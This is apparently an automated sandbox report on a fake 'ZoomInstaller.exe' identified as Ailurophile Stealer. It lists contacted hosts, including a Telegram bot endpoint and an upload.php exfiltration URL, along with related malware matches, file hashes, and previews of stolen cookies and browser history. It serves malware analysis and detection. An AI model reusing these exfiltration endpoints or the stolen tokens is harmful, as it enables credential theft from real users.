    https://contoso.com/Icon | powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr | false | URL Reputation: safe | unknown
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr | false | URL Reputation: safe | unknown
    https://api.telegram.org/bot%s/sendMessage | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://manestvli.shop/upload.php?C: | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://www.ecosia.org/newtab/ | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
    https://ac.ecosia.org/autocomplete?q= | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125 | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr | false | URL Reputation: safe | unknown
    https://ailurophilestealer.com/bot | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://contoso.com/ | powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://oneget.orgX | powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://aka.ms/pscore68 | powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016======== | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://oneget.org | powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://ailurophilestealer.com | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.26.9.59 | api.myip.com | United States | 13335 | CLOUDFLARENETUS | false
188.114.97.3 | manestvli.shop | European Union | 13335 | CLOUDFLARENETUS | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1544493
                                          Start date and time:2024-10-29 14:02:11 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:ZoomInstaller.exe
                                          Detection:MAL
                                          Classification:mal76.troj.spyw.evad.winEXE@28/27@3/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 2
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Stop behavior analysis, all processes terminated
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: ZoomInstaller.exe
Time | Type | Description
09:03:06 | API Interceptor | 3x Sleep call for process: WMIC.exe modified
09:03:12 | API Interceptor | 16x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Documentos.exe | malicious | Snake Keylogger |
149.154.167.220 | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger |
149.154.167.220 | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | swift-copy31072024PDF.html | malicious | HTMLPhisher |
149.154.167.220 | Fedex.exe | malicious | AgentTesla |
149.154.167.220 | come.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | Fa24c148.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | AWB#21138700102.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
104.26.9.59 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer |
104.26.9.59 | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar |
104.26.9.59 | iBO7gzlZr3.exe | malicious | LummaC |
104.26.9.59 | 5zFCjSBLvw.exe | malicious | LummaC, Go Injector, LummaC Stealer |
104.26.9.59 | FySc2FzpA8.exe | malicious | Go Injector |
104.26.9.59 | setup.exe | malicious | LummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, Vidar |
104.26.9.59 | 1719859269.0326595_setup.exe | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig |
104.26.9.59 | SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe | malicious | PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT |
104.26.9.59 | SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRAT |
104.26.9.59 | SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exe | malicious | PureLog Stealer |
188.114.97.3 | rPO-000172483.exe | malicious | FormBook | www.launchdreamidea.xyz/2b9b/
188.114.97.3 | rPO_28102400.exe | malicious | Lokibot | ghcopz.shop/ClarkB/PWS/fre.php
188.114.97.3 | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
188.114.97.3 | SR3JZpolPo.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
188.114.97.3 | 5Z1WFRMTOXRH6X21Z8NU8.exe | malicious | Unknown | artvisions-autoinsider.com/8bkjdSdfjCe/index.php
188.114.97.3 | PO 4800040256.exe | malicious | FormBook | www.cc101.pro/4hfb/
188.114.97.3 | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/cDXpxO66/download
188.114.97.3 | Instruction_1928.pdf.lnk.download.lnk | malicious | LummaC | tech-tribune.shop/pLQvfD4d5/index.php
188.114.97.3 | WBCDZ4Z3M2667YBDZ5K4.bin.exe | malicious | Unknown | tech-tribune.shop/pLQvfD4d5/index.php
188.114.97.3 | yGktPvplJn.exe | malicious | Pushdo | www.rs-ag.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.myip.com | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer | 104.26.9.59
api.myip.com | gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 104.26.8.59
api.myip.com | kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 172.67.75.163
api.myip.com | Z66MsXpleT.exe | malicious | LummaC, Stealc, Vidar | 172.67.75.163
api.myip.com | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 104.26.9.59
api.myip.com | iBO7gzlZr3.exe | malicious | LummaC | 104.26.9.59
api.myip.com | 7CTH165fQv.exe | malicious | Latrodectus | 104.26.8.59
api.myip.com | 3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | 172.67.75.163
api.myip.com | 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe | malicious | Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar | 104.26.8.59
api.myip.com | 5zFCjSBLvw.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.26.9.59
api.telegram.org | Documentos.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | swift-copy31072024PDF.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | Fedex.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | come.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | Fa24c148.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | AWB#21138700102.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Documentos.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | rShippingDocuments240384.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | M2AB8BeHc4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | swift-copy31072024PDF.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | Fedex.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | come.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
TELEGRAMRU | Fa24c148.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | AWB#21138700102.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | Documentos.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | PAGO FRAS PENDIENTES.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6 | malicious | Mamba2FA | 104.17.25.14
CLOUDFLARENETUS | rPO-000172483.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | Avis de virement.10.28.html | malicious | Unknown | 172.66.0.235
CLOUDFLARENETUS | https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para); | malicious | Unknown | 104.17.25.14
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                  Category:dropped
                                                                                  Size (bytes):6100
                                                                                  Entropy (8bit):7.122810248109388
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:R166v/VJELcr2oaVGr5B62ja5+1JuV+1+HlhZXS90bQfZnUOLq/0lM8HuF:TINXgrK+Li9fbQfZnUyq/Z8u
                                                                                  MD5:2B86C9493B01CF6F1AEF9A6BCBB157D8
                                                                                  SHA1:2FC7DAE2E5491A42E800923AD8D93A08B96AD6D5
                                                                                  SHA-256:056C8AB47B7BFA70D424BBD190FC682A0D43240A901300F5E094D5B14ED5D496
                                                                                  SHA-512:2924B8F7CE1E6C40E0DEB25211EC9A1A30E99F50C2B2D380EFCAD4D037366DF33B53E38890651C5AB685E153C5D78C05926C9F02512B66E3AEF58572A60945F1
                                                                                  Malicious:false
                                                                                  Preview:PK............................Ailurophile/PK............................Ailurophile\Autofills/PK........................#...Ailurophile\Autofills\Autofills.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.....XZ.....S..._....._............X.S.......PK..G...S...V...PK............................Ailurophile\Cards/PK............................Ailurophile\Cards\Cards.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP......X.R..._........PK...@.`;...>...PK............................Ailurophile\Cookies/PK........................&...Ailurophile\Cookies\Google_Default.txt.I..J..>..V..8..LH>.....`&..#..f.........wU..hvH.'##.x....M{.J...IX....eGJ..a.._..O.S....6MZ.....;o..>..h..A..x."n.5....[.}w.+...G.-....G.[.a......N'1..3.g....DP...OY.b~..n.M.....i.+...Q;.6.s.cu.I..Y......[.j'6.9rg...].>...v..3..............x{.nm...{..}34...+..C.%....]..W.o..B.........'e8fM.^]..Y..}L...d#...G..?...T.]...._l..vKj."7uM..}..1y..e.7...).u.Y...G@[........@mP$.q...E{.z..a.t..k..A..T...$..um.y~U(..y].vqG.
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):86
                                                                                  Entropy (8bit):4.332226354824286
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rbEKcJW5KeBF3R3AV:ziJi4wEJObEKcY5JFh3AV
                                                                                  MD5:6617FAF8F3D5A4BAB9ED7E6D6D81E9AC
                                                                                  SHA1:47C5D229C3D06A26D685B7C3357C9AA1951ED676
                                                                                  SHA-256:3D87146BA69810E07CAD4BD64C1731D41A2359E5D97E47115CA467784FCFC7EB
                                                                                  SHA-512:452F926F36BE843D2B76CDD7079B058986620419BB093B563AB17435B95B05D865B6903124723B2C9A60A04114EDE43CA6DEB2694AB7CCBCE4BF831B590855FE
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No autofills found for Google Default.
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):62
                                                                                  Entropy (8bit):4.411474689552285
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rZrln:ziJi4wEJOZZn
                                                                                  MD5:7166946D592DA0325381A8F84248F7C7
                                                                                  SHA1:5DEF442E33A3A6A1890C12055A000D5014E86CB8
                                                                                  SHA-256:905E8F268FF0D5C67976E0AB04DCB91BB61A9495FB6E9E840B1CA7A962FA0D72
                                                                                  SHA-512:FE482A1AE8F524823D522B95CE1393061328C4DD202A657D5CCFBD79FD326D7B3D504B7505D4C6F042089063CBA3E4F65468B579B93CBEC562BCB7EC402A0D08
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No cards found
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text, with very long lines (515)
                                                                                  Category:dropped
                                                                                  Size (bytes):3206
                                                                                  Entropy (8bit):5.895986559721474
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:5xJoGpO2FpcRDpZAhho6Vjv3sBC/Nf8CSs+ZwX9chsW:5LoqMRjGuHt
                                                                                  MD5:36B5263419559D1B7622ED7176C0F3D7
                                                                                  SHA1:7EC3A9BF8A391741E277DC3FDD6D382A320A83C9
                                                                                  SHA-256:147623264DC09FE33055A2846BD1275CE2D09F31188715795D18006DD1747215
                                                                                  SHA-512:43FDD3B2BE9C2A108C786731E28669EEBB649E968BA5BA15C7BD55AFC0442F294DF79A3EC5285DE8B12D8253F58683DB65D3B676ECB3403D5B327AFBD568E1D6
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn...google.com.TRUE./.FALSE.2597573456.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.FALSE.2597573456.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.2597573456.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):2226
                                                                                  Entropy (8bit):5.24684544934056
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:5JYmmNde26wtmNde2tVcDKJ3mNde2tVuDKJ3mEde2YtY42KppfY42tVVpbdY42tq:5JYmmNJ6wtmNJtaDK3mNJtEDK3mEJYtU
                                                                                  MD5:12B2217E44EF5083B62C8D70992D3111
                                                                                  SHA1:D5FEBE906162C78F9295BC925697DC9B5EBA30B0
                                                                                  SHA-256:74E0B9DF379BFB170345AC83034E8C86183621510DCF25C66EC1C3DDFF3BFCCF
                                                                                  SHA-512:4C38AF5D9D3B091F8FCBE904E5CA594777E9DABD3AB86578587518427BE1A57F0A3DD991AC6E04EC9F41198B814152588D0802E20825DF62CD533C737C467B56
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[================.URL: https://go.microsoft.com/fwlink/?linkid=851546.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us.Title: Examples of Of
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):66
                                                                                  Entropy (8bit):4.485787733894543
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3+iJyn:ziJi4wEJv
                                                                                  MD5:34603047D92D7328CEFA79DE178D1971
                                                                                  SHA1:BE2435B5DAB5DD358E03F6C7FEE3C384826343CF
                                                                                  SHA-256:F353C24B1CD9A4E0BF4EC5572387A68D85196E27B33F9E5F713DC8DCE23C19A0
                                                                                  SHA-512:051DA884D5957CC781BCFDD665521CA32EC152068AC4684CDD1ABCC01F1FAC26ACBADF1CAADC4F0067DE2134FCD30120F0F4F4E1037996CE29783507CEA1AF71
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[No history found]
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):65
                                                                                  Entropy (8bit):4.422163682746226
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                  MD5:4136A47D671A2B0555965D0175796441
                                                                                  SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                  SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                  SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (425)
                                                                                  Category:dropped
                                                                                  Size (bytes):985
                                                                                  Entropy (8bit):5.00660932715055
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:m19iRRpNYH+xalS+5on+fWu8DkiKTxp/AphGFWVZluLCIHeu6YBkL1S:zBK+QSdniiDL0ynVZl4HeMBIc
                                                                                  MD5:8383D037D31FD3CDE6BCA05191A8B84B
                                                                                  SHA1:E6144AC88FF0148A563886D77BBEBEE6BD4D62FD
                                                                                  SHA-256:D52DAE118152B18E258D89DDE0C1E20909F65D616323162903A6E45ED3A8871A
